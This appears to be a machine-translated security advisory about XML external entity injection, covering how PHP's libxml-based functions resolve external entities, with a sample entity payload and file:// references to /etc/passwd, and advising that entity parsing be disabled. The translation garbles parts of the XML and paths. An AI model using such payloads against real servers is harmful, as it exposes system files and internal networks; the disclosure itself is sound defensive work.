Vulnerability description: Extensible Markup Language (XML) is used to mark electronic files so that they have a structured Markup Language. It can be used to mark data and define data types, is a source language that allows you to define your own markup language. XML is a subset of the standard general Markup Language (SGML) and is suitable for Web transmission. XML provides a unified way to describe and exchange structured data independent of applications or vendors. 80sec found that an old xml entity injection vulnerability exists in some common XML application scenarios, which may cause serious security problems, attackers can access the server and any resources in the network where the application is located;
Vulnerability Analysis: XML, as a widely used data transmission format, allows reference of external resources within the language to supplement the language. For example
<? Xml version = "1.0" encoding = "UTF-8" standalone = "yes"?>
<! DOCTYPE copyright [
<! ELEMENT copyright (# PCDATA)>
<! ENTITY hi80sec SYSTEM "http://www.wooyun.org/">
]>
<Wooyun version = "2.0">
<Whitehats>
& Hi80sec; is a legend
</Whitehats>
</Wooyun>
This will enable the xml parser to reference external resources www.wooyun.org as the content of the hi80sec entity in the current context, and then introduce this part of data into the logical process for processing in the actual application context. Similarly, we can use
File: // etc/passwd
Word "> file: // localhost/etc/password
To access the local file system.
Different resolvers may have different processing rules for external entities by default. Taking the PHP language as an example, the default xml processing methods include:
Xml_parse
And
Simplexml_load
Two different methods: the two different methods adopt different underlying logic implementation at the underlying layer. The xml_parse implementation method is the expat library, while simplexml_load uses the libxml Library, the details of the two underlying libraries are not the same during parsing. expat does not parse external entities by default, while simplexml_load will parse external entities by default, therefore, simplexml_load, DOM, and other functions will be affected by this problem, while xml_parse will not be affected by default.
This problem exists not only in PHP, but also in external components and functions that process xml, such as Java and Python, problems have been found in some Internet companies and some widely used open-source software.
Proof of vulnerability: we will submit the proven security vulnerabilities on the WooYun vulnerability reporting platform.
Solution: check the underlying xml parsing library used. By default, external entity parsing is prohibited, and monitoring of the system is enhanced to prevent this problem from being exploited; we will release potentially affected vulnerabilities on the WooYun vulnerability reporting platform